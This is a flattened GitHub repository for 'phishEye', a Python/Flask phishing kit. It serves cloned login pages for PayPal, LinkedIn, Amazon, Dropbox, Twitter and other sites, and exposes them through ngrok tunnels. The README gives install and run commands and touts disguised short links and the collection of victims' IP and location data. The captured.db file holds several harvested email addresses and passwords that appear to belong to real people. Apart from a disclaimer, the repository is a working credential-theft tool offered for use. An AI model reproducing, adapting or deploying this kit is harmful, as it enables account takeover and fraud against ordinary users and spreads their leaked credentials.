Sign in
35 |Stay updated on your professional world
36 |├── .gitignore ├── img ├── logo.png ├── Preview.gif └── Preview_v1.3.gif ├── requirements.txt ├── .github └── ISSUE_TEMPLATE │ ├── feature_request.md │ └── bug_report.md ├── captured.db ├── LICENSE ├── server ├── banner.py ├── templates │ └── index.html └── httpServer.py ├── site ├── mob │ ├── twitter │ │ └── index.html │ ├── paypal │ │ └── index.html │ ├── linkedin │ │ └── index.html │ ├── amazon │ │ └── index.html │ ├── dropbox │ │ └── index.html │ └── deviantart │ │ └── index.html └── pc │ ├── paypal │ └── index.html │ ├── linkedin │ └── index.html │ ├── messenger │ └── index.html │ ├── amazon │ └── index.html │ ├── deviantart │ └── index.html │ ├── dropbox │ └── index.html │ └── github │ └── index.html ├── Readme.md └── phishEye.py /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ -------------------------------------------------------------------------------- /img/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sky9262/phishEye/HEAD/img/logo.png -------------------------------------------------------------------------------- /img/Preview.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sky9262/phishEye/HEAD/img/Preview.gif -------------------------------------------------------------------------------- /img/Preview_v1.3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sky9262/phishEye/HEAD/img/Preview_v1.3.gif -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | click==8.0.3 2 | colorama==0.4.4 3 | Flask==2.0.2 4 | itsdangerous==2.0.1 5 | Jinja2==3.0.2 6 | MarkupSafe==2.0.1 7 | pyngrok==5.1.0 8 | PyYAML==6.0 9 | waitress==2.0.0 10 | Werkzeug==2.0.2 11 | requests==2.26.0 12 | urllib3==1.26.7 13 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /captured.db: -------------------------------------------------------------------------------- 1 | 2 | facebook.com| ID : akash002.pat@gmail.com | Password: 789788544 3 | ------------------------------------------------------------------------------------------------------- 4 | paypal.com| ID : akash002.pat@gmail.com | Password: fgdgfgfgfd 5 | ------------------------------------------------------------------------------------------------------- 6 | paypal.com| ID : ashri55@gmail.com | Password: dew2345fdd 7 | ------------------------------------------------------------------------------------------------------- 8 | dropbox.com| ID : alokok143@gmail.com | Password: ddsdfsdf 9 | ------------------------------------------------------------------------------------------------------- 10 | https://twitter.com| ID : akash2002.pat@gmail.com | Password: asdds213123123 11 | ------------------------------------------------------------------------------------------------------- 12 | twitter.com| ID : akash2002.pat@gmail.com | Password: asdsdasdsdsa 13 | ------------------------------------------------------------------------------------------------------- 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Akash Kumar 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /server/banner.py: -------------------------------------------------------------------------------- 1 | import os 2 | try: 3 | import colorama 4 | except: 5 | print("Some modules are not installed!!\nPlease wait. Installing.......") 6 | os.system('pip install colorama --quiet') 7 | os.system('cls' if os.name == 'nt' else 'clear') 8 | 9 | from colorama import Fore, Style 10 | import os 11 | import time 12 | 13 | 14 | 15 | def PrintBanner(): 16 | print(''' 17 | {red}██████╗ ██╗ ██╗██╗███████╗██╗ ██╗ ███████╗██╗ ██╗███████╗{reset} 18 | {yellow}██╔══██╗██║ ██║██║██╔════╝██║ ██║ ██╔════╝╚██╗ ██╔╝██╔════╝{reset} 19 | {bright}{yellow}██████╔╝███████║██║███████╗███████║ █████╗ ╚████╔╝ █████╗ {reset} 20 | {green}██╔═══╝ ██╔══██║██║╚════██║██╔══██║ ██╔══╝ ╚██╔╝ ██╔══╝ {reset} 21 | {blue}██║ ██║ ██║██║███████║██║ ██║ ███████╗ ██║ ███████╗{reset} 22 | {pink}╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝╚═╝ ╚═╝ ╚══════╝ ╚═╝ ╚══════╝{reset} 23 | {bright}Version {green}{ver}\t\t\t\t\t\tBy: {yellow}sky9262{white} 24 | '''.format(ver=1.6, red=Fore.RED, yellow=Fore.YELLOW, green=Fore.GREEN, 25 | blue=Fore.BLUE, pink=Fore.MAGENTA, white=Fore.WHITE, reset=Style.RESET_ALL, bright=Style.BRIGHT)) 26 | 27 | time.sleep(2) 28 | 29 | # PrintBanner() 30 | -------------------------------------------------------------------------------- /server/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |
4 |
5 |
10 |
11 |
12 |
13 |
A beginners friendly, Automated phishing tool
16 | 17 |phishEye is a ultimate phishing tool in python. Includes popular websites like Facebook, Twitter, Instagram, LinkedIn, GitHub, Dropbox, and many others. Created with Flask and custom templates and tunneled with ngrok.
18 | 19 |Disclaimer
20 | 21 | Any actions and or activities related to phishEye is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law. 22 | 23 | This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing this in a wrong way. 24 | 25 | This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here! 26 | 27 | It only demonstrates "how phishing works". You shall not misuse the information to gain unauthorized access to someone's social media. However, you may try out this at your own risk. 28 | 29 | ### Features 30 | 31 | - Latest and updated login pages. 32 | - Beginners friendly 33 | - Auto install all required modules 34 | - Multiple tunneling options 35 | - Localhost 36 | - Ngrok 37 | - Localhost.run 38 | - Phishing short url ( i.e.: https://m.facebook.com@is.gd/dyoOj9 ) 39 | - Victim information (like, IP,user-agent,continent,country,region name,city,district,zip code,latitude-longitude and ISP) 40 | 41 | ### Requirements 42 | 43 | **`phishEye`** requires the following programs to run properly - 44 | - `python3` 45 | - `pip3` 46 | 47 | ### Installation 48 | 49 | - Just, Clone this repository - 50 | ``` 51 | $ git clone https://www.github.com/sky9262/phishEye.git 52 | ``` 53 | 54 | - Change to the cloned directory - 55 | ``` 56 | $ cd phishEye 57 | ``` 58 | 59 | - Now run `phishEye.py` - 60 | ``` 61 | $ python3 phishEye.py 62 | ``` 63 | 64 | ### Install required modules if auto-install is not working 65 | - Install required modules to run `phishEye.py` - 66 | ``` 67 | $ pip3 install -r requirements.txt 68 | ``` 69 | 70 | 71 | ## Usage 72 | - By running `python3 phishEye.py`, you will be provided to choose options. 73 | - **OR** 74 | - You can run it in one line `python3 phishEye.py -s facebook -d pc -p 4444` 75 | - **Note:** Username/Password will be saved in captured.db 76 | 77 | ### Here `-s`, `-d` and `-p` are options : 78 | - `-s` --> site name (from available sites) **(Default: facebook)** 79 | - `-d` --> device (like, PC or MOBILE) **(Default: PC)** 80 | - `-p` --> port number **(Default: 4444)** 81 | 82 |
86 |
87 |
92 |93 |124 |PC
94 |95 | 96 | [1] Amazon 97 | 98 | [2] DeviantArt 99 | 100 | [3] Dropbox 101 | 102 | [4] eBay 103 | 104 | [5] Facebook 105 | 106 | [6] Github 107 | 108 | [7] GitLab 109 | 110 | [8] Google 111 | 112 | [9] Instagram 113 | 114 | [10] LinkedIn 115 | 116 | [11] Messenger 117 | 118 | [12] PayPal 119 | 120 | [13] Twitter 121 | 122 |
123 |125 |154 |MOBILE
126 |127 | 128 | [1] Amazon 129 | 130 | [2] DeviantArt 131 | 132 | [3] Dropbox 133 | 134 | [4] eBay 135 | 136 | [5] Facebook 137 | 138 | [6] Github 139 | 140 | [7] GitLab 141 | 142 | [8] Google 143 | 144 | [9] Instagram 145 | 146 | [10] LinkedIn 147 | 148 | [11] PayPal 149 | 150 | [12] Twitter 151 | 152 |
153 |
Stay updated on your professional world
36 |56 | New to linkedin? 57 | 58 | Join now 59 | 60 |
61 |Stay updated on your professional world
35 |55 | New to linkedin? 56 | 57 | Join now 58 | 59 |
60 |-------------------------------------------------------------------------------- /site/mob/amazon/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 |
158 |
160 | 161 |
164 |
165 |
166 | 167 | 197 |